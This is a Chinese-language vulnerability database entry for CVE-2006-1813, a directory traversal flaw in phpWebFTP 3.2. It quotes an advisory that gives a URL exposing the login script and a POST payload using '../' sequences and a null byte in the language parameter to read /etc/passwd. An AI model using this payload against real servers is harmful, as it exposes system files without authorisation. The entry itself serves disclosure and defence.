PHPWebFTP Index.PHP 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195359 漏洞类型 路径遍历
发布时间 2006-04-18 更新时间 2006-04-18
CVE编号 CVE-2006-1813 CNNVD-ID CNNVD-200604-261
漏洞平台 N/A CVSS评分 6.4
|漏洞来源
https://cxsecurity.com/issue/WLB-2006040052
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-261
|漏洞详情
phpWebFTP3.2及早期版本中的index.php存在目录遍历漏洞。这使得远程攻击者可以借助于language参数中的..(点点)读取任意文件。
|漏洞EXP
Summary 
===============================================
phpWebFTP enables connections to FTP servers, even behind a firewall not allowing traffic. phpWebFTP bypasses the firewall by making a FTP connection from your webserver to the FTP server and transfering the files to your webclient over the http protocol

===========================================

Issue :
Well I have found that most of the sites that use phpwebftp v3.2 > less  have a problem. The user login script is a javascript file called script.js. This file validates the user input in the logon box. But to my surprise this file is directly accessed by web browser . The  disclosure of the source code can help an attacker to trigger    code injections .

Exploit :
http://www.anysite.com/PhpWebFtp/include/script.js

Further a directory traversal is possible via malicious arguments passed on the web browser using POST Method relative to the path of phpWebftp ie. http://www.anysite.com/PhpWebFtp/index.php? .

'server=1&port=21&goPassive=on&user=1&password=1&language=../../../../..
/../../../etc/passwd%00'
|参考资料

来源:BID
名称:17557
链接:http://www.securityfocus.com/bid/17557
来源:BUGTRAQ
名称:20060417PhpWebFTP3.2LoginScript
链接:http://www.securityfocus.com/archive/1/archive/1/431115/100/0/threaded
来源:XF
名称:phpwebftp-index-directory-traversal(25920)
链接:http://xforce.iss.net/xforce/xfdb/25920
来源:VUPEN
名称:ADV-2006-1388
链接:http://www.frsirt.com/english/advisories/2006/1388
来源:SREASON
名称:723
链接:http://securityreason.com/securityalert/723
来源:SECUNIA
名称:19706
链接:http://secunia.com/advisories/19706